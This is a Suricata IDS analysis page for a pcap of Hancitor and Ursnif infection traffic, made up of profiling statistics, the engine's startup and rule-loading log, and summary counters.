Filename: 2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 21.9562020302 seconds
Hash: 2280b037326fec8a762c9a1b32aae0ca
Uploaded: 1548933098

Logfiles


packet_stats.log - (12657 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          1031         21408539     1027265378     418217623        431.2b   29.24
 IPv4      17          1436         20851891     1028072446     726493672       1043.2b   70.76
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          1031            66872       20648310        522533        538.7m   46.94
TMM_FLOWWORKER              IPv4      17          1436           232835        9904982        390808        561.2m   48.89
TMM_RECEIVEPCAPFILE         IPv4       6          1031             2538           4295          2909          3.0m    0.26
TMM_RECEIVEPCAPFILE         IPv4      17          1436             2541        4612074          5977          8.6m    0.75
TMM_DECODEPCAPFILE          IPv4       6          1031             2652       28783100         30924         31.9m    2.78
TMM_DECODEPCAPFILE          IPv4      17          1436             2656          45140          3062          4.4m    0.38

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          1031             2829         106294          3538          3.6m  0.37  
flow                    IPv4      17          1436             2803          39228          4168          6.0m  0.61  
stream                  IPv4       6          1031             2706         315853         16447         17.0m  1.72  
app-layer               IPv4      17          1436             8038          78637         12955         18.6m  1.89  
detect                  IPv4       6          1031            44373       20208469        468608        483.1m  49.06 
detect                  IPv4      17          1436           196406         588555        315709        453.4m  46.04 
tcp-prune               IPv4       6          1031             2534          19589          2998          3.1m  0.31  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            38             4798          39527         21483        816.4k  12.62 
dns                     IPv4      17          1436             2678          26781          3936          5.7m  87.38 
Proto detect            IPv4      17          1410             2905          33105          3717          5.2m

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            34            29703          95128         46025          1.6m  2.05  
LOGGER_ALERT_FAST           IPv4      17             5            16715          31513         26650        133.3k  0.17  
LOGGER_UNIFIED2             IPv4       6            34            25248         193952         52707          1.8m  2.35  
LOGGER_UNIFIED2             IPv4      17             5            20437          35810         29860        149.3k  0.20  
LOGGER_JSON_ALERT           IPv4       6            34            52196         123103         73425          2.5m  3.27  
LOGGER_JSON_ALERT           IPv4      17             5            36053          41861         39068        195.3k  0.26  
LOGGER_JSON_DNS             IPv4      17          1278            23821        9204639         47957         61.3m  80.33 
LOGGER_JSON_HTTP            IPv4       6            55            35434         157169         57614          3.2m  4.15  
LOGGER_JSON_FILE            IPv4       6            82            45106         130879         67139          5.5m  7.22  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           608             2593         408486         23075        14.0m  10.94 
payload                           IPv4      17          1436             3409          65459          7754        11.1m  8.68  
stream                            IPv4       6           608             2530       12951596         55411        33.7m  26.27 
http_uri                          IPv4       6            55             5281          73441         17550       965.3k  0.75  
http_request_line                 IPv4       6            55             3842          56432          6719       369.6k  0.29  
http_client_body                  IPv4       6            57             2722          59731         17626         1.0m  0.78  
http_header (request)             IPv4       6            55            17701         105052         53052         2.9m  2.28  
http_header (request trailer)     IPv4       6            55             2586          17934          2953       162.4k  0.13  
http_header_names (request)       IPv4       6            55             7666          53711         18384         1.0m  0.79  
http_accept (request)             IPv4       6            55             2875          24233          4130       227.2k  0.18  
http_referer (request)            IPv4       6            55             2803          18413          3713       204.2k  0.16  
http_content_len (request)        IPv4       6            55             2875          18615          4644       255.4k  0.20  
http_content_type (request)       IPv4       6            55             2801          38241          7374       405.6k  0.32  
http_protocol (request)           IPv4       6            55             3372          18971          4994       274.7k  0.21  
http_start (request)              IPv4       6            55             6901          31168         12294       676.2k  0.53  
http_raw_header (request)         IPv4       6            57             7909          27905         12739       726.1k  0.57  
http_method                       IPv4       6            55             3463          33706          5834       320.9k  0.25  
http_cookie (request)             IPv4       6            55             2905         609382         14576       801.7k  0.63  
http_raw_uri                      IPv4       6            55             3199          11241          5161       283.9k  0.22  
http_user_agent                   IPv4       6            55             8439          41260         19823         1.1m  0.85  
http_host                         IPv4       6            55             3735          10344          6606       363.4k  0.28  
dns_query                         IPv4      17           658             2770          57721          3763         2.5m  1.93  
http_response_line                IPv4       6            55             3263          20885          6623       364.3k  0.28  
http_header (response)            IPv4       6            55             7725          57390         30965         1.7m  1.33  
http_header (response trailer)    IPv4       6            55             2626          16121          4525       248.9k  0.19  
http_content_type (response)      IPv4       6            55             3601          10432          6605       363.3k  0.28  
http_raw_header (response)        IPv4       6           432             3916          27107          4924         2.1m  1.66  
http_cookie (response)            IPv4       6            55             2906          18087          3889       213.9k  0.17  
http_stat_code                    IPv4       6            55             2785          27774          4135       227.4k  0.18  
file_data (http response)         IPv4       6           377             2567        6278700        131578        49.6m  38.68 
Total                             IPv4                  5443                                         23561       128.2m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6            76             7688          73551         30126          2.3m  0.19  
PROF_DETECT_IPONLY          IPv4      17          1276             3308         101958         26686         34.1m  2.87  
PROF_DETECT_RULES           IPv4       6          1031             2527       18863633        272089        280.5m  23.64 
PROF_DETECT_RULES           IPv4      17          1436           126215         421636        199689        286.8m  24.17 
PROF_DETECT_STATEFUL_START    IPv4       6           482             5098       18408456        313774        151.2m  12.75 
PROF_DETECT_STATEFUL_START    IPv4      17             5            12494          30688         16312         81.6k  0.01  
PROF_DETECT_STATEFUL_CONT    IPv4       6          1031             2512         413967         12785         13.2m  1.11  
PROF_DETECT_STATEFUL_CONT    IPv4      17          1436             5740          90098          6341          9.1m  0.77  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           879             2551          33530          2893          2.5m  0.21  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17          1436             2546          28806          2843          4.1m  0.34  
PROF_DETECT_PREFILTER       IPv4       6          1031             7828       13794774        140965        145.3m  12.25 
PROF_DETECT_PREFILTER       IPv4      17          1436            24766         103378         37840         54.3m  4.58  
PROF_DETECT_PF_PAYLOAD      IPv4       6           608            15137       12962873         86870         52.8m  4.45  
PROF_DETECT_PF_PAYLOAD      IPv4      17          1436             8458          70762         13251         19.0m  1.60  
PROF_DETECT_PF_TX           IPv4       6           879             2562        6293965         86501         76.0m  6.41  
PROF_DETECT_PF_TX           IPv4      17           810             2553          64310          8286          6.7m  0.57  
PROF_DETECT_PF_SORT1        IPv4       6           432             2540          28113          4602          2.0m  0.17  
PROF_DETECT_PF_SORT1        IPv4      17          1436             2780          30321          3657          5.3m  0.44  
PROF_DETECT_PF_SORT2        IPv4       6          1031             2520          44935          3088          3.2m  0.27  
PROF_DETECT_PF_SORT2        IPv4      17          1436             2610          63871          3106          4.5m  0.38  
PROF_DETECT_NONMPMLIST      IPv4       6          1031             2525          51439          3116          3.2m  0.27  
PROF_DETECT_NONMPMLIST      IPv4      17          1436             2566          41809          2995          4.3m  0.36  
PROF_DETECT_ALERT           IPv4       6          1031             2516          40409          2864          3.0m  0.25  
PROF_DETECT_ALERT           IPv4      17          1436             2520          23675          2820          4.1m  0.34  
PROF_DETECT_CLEANUP         IPv4       6          1031             2549          37212          3075          3.2m  0.27  
PROF_DETECT_CLEANUP         IPv4      17          1436             2514          35924          3096          4.4m  0.37  
PROF_DETECT_GETSGH          IPv4       6          1031             2513          34706          3135          3.2m  0.27  
PROF_DETECT_GETSGH          IPv4      17          1436             2533          48958          5591          8.0m  0.68  


suricata-report-2019-01-31-T-11-12-00-01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap.txt - (17845 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/2280b037326fec8a762c9a1b32aae0ca56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap -vvv -k none
elapsedtime:21.063626
stderr:
stdout:
31/1/2019 -- 11:11:39 - <Info> - Configuration node 'rule-files' redefined.
31/1/2019 -- 11:11:39 - <Notice> - This is Suricata version 4.0.0 RELEASE
31/1/2019 -- 11:11:39 - <Info> - CPUs/cores online: 1
31/1/2019 -- 11:11:39 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32087 and 'request-body-inspect-window' set to 16142 after randomization.
31/1/2019 -- 11:11:39 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 31704 and 'response-body-inspect-window' set to 15941 after randomization.
31/1/2019 -- 11:11:39 - <Config> - DNS request flood protection level: 500
31/1/2019 -- 11:11:39 - <Config> - DNS per flow memcap (state-memcap): 524288
31/1/2019 -- 11:11:39 - <Config> - DNS global memcap: 16777216
31/1/2019 -- 11:11:39 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
31/1/2019 -- 11:11:39 - <Config> - preallocated 1000 hosts of size 136
31/1/2019 -- 11:11:39 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
31/1/2019 -- 11:11:39 - <Config> - using magic-file /usr/share/file/magic
31/1/2019 -- 11:11:39 - <Config> - Core dump size is unlimited.
31/1/2019 -- 11:11:39 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
31/1/2019 -- 11:11:39 - <Config> - preallocated 1000 defrag trackers of size 168
31/1/2019 -- 11:11:39 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
31/1/2019 -- 11:11:39 - <Config> - stream "prealloc-sessions": 2048 (per thread)
31/1/2019 -- 11:11:39 - <Config> - stream "memcap": 33554432
31/1/2019 -- 11:11:39 - <Config> - stream "midstream" session pickups: disabled
31/1/2019 -- 11:11:39 - <Config> - stream "async-oneside": disabled
31/1/2019 -- 11:11:39 - <Config> - stream "checksum-validation": disabled
31/1/2019 -- 11:11:39 - <Config> - stream."inline": disabled
31/1/2019 -- 11:11:39 - <Config> - stream "bypass": disabled
31/1/2019 -- 11:11:39 - <Config> - stream "max-synack-queued": 5
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "memcap": 134217728
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "depth": 0
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "toserver-chunk-size": 2485
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "toclient-chunk-size": 2581
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly.raw: enabled
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "segment-prealloc": 2048
31/1/2019 -- 11:11:39 - <Config> - Delayed detect disabled
31/1/2019 -- 11:11:39 - <Config> - pattern matchers: MPM: ac, SPM: bm
31/1/2019 -- 11:11:39 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
31/1/2019 -- 11:11:39 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
31/1/2019 -- 11:11:39 - <Config> - prefilter engines: MPM
31/1/2019 -- 11:11:39 - <Config> - IP reputation disabled
31/1/2019 -- 11:11:39 - <Perf> - Registered 148 keyword profiling counters.
31/1/2019 -- 11:11:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
31/1/2019 -- 11:11:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
31/1/2019 -- 11:11:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
31/1/2019 -- 11:11:44 - <Config> - No rules loaded from ET-icmp.rules.
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
31/1/2019 -- 11:11:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
31/1/2019 -- 11:11:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
31/1/2019 -- 11:11:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
31/1/2019 -- 11:11:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
31/1/2019 -- 11:11:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
31/1/2019 -- 11:11:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
31/1/2019 -- 11:11:51 - <Config> - No rules loaded from local.rules.
31/1/2019 -- 11:11:51 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
31/1/2019 -- 11:11:51 - <Info> - Threshold config parsed: 0 rule(s) found
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tcp-packet
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tcp-stream
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for udp-packet
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for other-ip
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_uri
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_request_line
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_client_body
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_response_line
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_header
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_header
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_header_names
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_header_names
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_accept
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_accept_enc
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_accept_lang
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_referer
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_connection
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_content_len
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_content_len
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_content_type
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_content_type
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_protocol
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_protocol
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_start
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_start
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_raw_header
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_raw_header
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_method
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_cookie
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_cookie
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_raw_uri
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_user_agent
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_host
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_raw_host
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_stat_msg
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_stat_code
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for dns_query
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tls_sni
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tls_cert_issuer
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tls_cert_subject
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tls_cert_serial
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for dce_stub_data
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for dce_stub_data
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for ssh_protocol
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for ssh_protocol
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for ssh_software
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for ssh_software
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for file_data
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for file_data
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_request_line
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_response_line
31/1/2019 -- 11:11:52 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
31/1/2019 -- 11:11:52 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
31/1/2019 -- 11:11:52 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
31/1/2019 -- 11:11:52 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
31/1/2019 -- 11:11:52 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
31/1/2019 -- 11:11:52 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
31/1/2019 -- 11:11:52 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
31/1/2019 -- 11:11:52 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
31/1/2019 -- 11:11:56 - <Perf> - Unique rule groups: 104
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toserver TCP packet": 35
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toclient TCP packet": 17
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toserver TCP stream": 33
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toclient TCP stream": 19
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toserver UDP packet": 27
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toclient UDP packet": 17
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "other IP packet": 3
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_uri": 14
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_request_line": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_client_body": 6
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_response_line": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_header": 10
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_header": 6
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_header_names": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_accept": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_referer": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_content_len": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_content_type": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_content_type": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_protocol": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_start": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_method": 5
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_cookie": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_cookie": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_host": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver dns_query": 4
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver tls_sni": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver file_data": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient file_data": 7
31/1/2019 -- 11:11:58 - <Perf> - Registered 39590 rule profiling counters.
31/1/2019 -- 11:11:58 - <Info> - fast output device (regular) initialized: alert
31/1/2019 -- 11:11:58 - <Info> - eve-log output device (regular) initialized: eve.json
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'alert'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'http'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'dns'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'tls'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'files'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'ssh'
31/1/2019 -- 11:11:58 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
31/1/2019 -- 11:11:58 - <Info> - stats output device (regular) initialized: stats.log
31/1/2019 -- 11:11:58 - <Config> - AutoFP mode using "Hash" flow load balancer
31/1/2019 -- 11:11:58 - <Info> - reading pcap file /var/pcap/01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap
31/1/2019 -

This file has been truncated. Go here to download in full.


stats.log - (3007 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
------------------------------------------------------------------------------------
Date: 1/31/2019 -- 11:12:00 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 2467
decoder.bytes                              | Total                     | 728382
decoder.ipv4                               | Total                     | 2467
decoder.ethernet                           | Total                     | 2467
decoder.tcp                                | Total                     | 1031
decoder.udp                                | Total                     | 1436
decoder.avg_pkt_size                       | Total                     | 295
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 38
flow.udp                                   | Total                     | 657
tcp.sessions                               | Total                     | 38
tcp.syn                                    | Total                     | 38
tcp.synack                                 | Total                     | 38
detect.alert                               | Total                     | 39
detect.mpm_list                            | Total                     | 11
detect.nonmpm_list                         | Total                     | 3
detect.fnonmpm_list                        | Total                     | 3
detect.match_list                          | Total                     | 14
app_layer.flow.http                        | Total                     | 38
app_layer.tx.http                          | Total                     | 55
app_layer.flow.dns_udp                     | Total                     | 657
app_layer.tx.dns_udp                       | Total                     | 658
flow_mgr.closed_pruned                     | Total                     | 1
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 16
flow_mgr.flows_notimeout                   | Total                     | 15
flow_mgr.flows_timeout                     | Total                     | 1
flow_mgr.flows_removed                     | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
